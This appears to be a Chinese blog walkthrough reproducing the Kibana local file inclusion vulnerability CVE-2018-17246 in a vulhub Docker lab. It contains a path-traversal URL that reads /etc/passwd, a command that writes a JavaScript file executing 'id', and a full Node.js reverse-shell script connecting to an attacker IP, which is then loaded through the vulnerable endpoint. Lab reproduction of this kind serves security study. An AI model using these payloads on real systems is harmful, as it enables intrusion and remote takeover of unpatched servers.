Kibana本地文件包含漏洞(CVE-2018-17246)
影响版本ElasticSearch Kibana < 6.4.3ElasticSearch Kibana < 5.6.13搭建过程cd vulhub-master/kibana/CVE-2018-17246docker-compose up -d验证POChttp://your-ip:5601/api/console/api_server?sense_version=%40%40SEN
·
影响版本
ElasticSearch Kibana < 6.4.3
ElasticSearch Kibana < 5.6.13
搭建过程
cd vulhub-master/kibana/CVE-2018-17246
docker-compose up -d
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eXbgQrAD-1627030595251)(https://note.youdao.com/yws/res/3/WEBRESOURCEc659cbb3280ee02dec0399020bc47923)]](https://i-blog.csdnimg.cn/blog_migrate/9731db139a4aada346d34c2211da512c.png)
验证POC
http://your-ip:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-z3WAWMt0-1627030595259)(https://note.youdao.com/yws/res/4/WEBRESOURCE1453bdd25ff5e515b8d4a1db158f9014)]](https://i-blog.csdnimg.cn/blog_migrate/bf6c8e32a212f315bc8285317405a22a.png)
漏洞利用
任意命令执行
echo 'export default {asJson: function() {return require("child_process").execSync("id").toString()}}' > /tmp/vulhub.js
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-czCzOZO0-1627030595263)(https://note.youdao.com/yws/res/c/WEBRESOURCEdc57ee00a6f54b326edf29c8af0ed0ec)]](https://i-blog.csdnimg.cn/blog_migrate/905b21d1f13c1ae878ab7c2afca3ce55.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8tBnfmIj-1627030595269)(https://note.youdao.com/yws/res/4/WEBRESOURCE3ca1447195729258b8219d7fd1868574)]](https://i-blog.csdnimg.cn/blog_migrate/bb6e5b795d99ca03c7f8f0678f84c3c7.png)
使用漏洞反弹shell
创建反弹shell的js文件,并上传至服务器
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(7777, "192.168.229.128", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
Kali使用nc进行监听
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kAUQftQg-1627030595276)(https://note.youdao.com/yws/res/7/WEBRESOURCEf0eff8e195a4f1361b7bb069ea16f987)]](https://i-blog.csdnimg.cn/blog_migrate/5fde78defec093e1228a038879636114.png)
然后访问反弹shell文件
http://192.168.229.132:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../tmp/shell.js
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VKdeq0Z7-1627030595277)(https://note.youdao.com/yws/res/3/WEBRESOURCEdc24207f859034dc0ad5873f323f8e23)]](https://i-blog.csdnimg.cn/blog_migrate/89d674531f816d39a9be6cba82d79ad7.png)
即可得到shell
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ChGtDuT6-1627030595283)(https://note.youdao.com/yws/res/f/WEBRESOURCE83aa0427181d848b7fd8ae44f40506df)]](https://i-blog.csdnimg.cn/blog_migrate/9d083476345249a4b6f7d21d12e3f91c.png)
更多推荐



所有评论(0)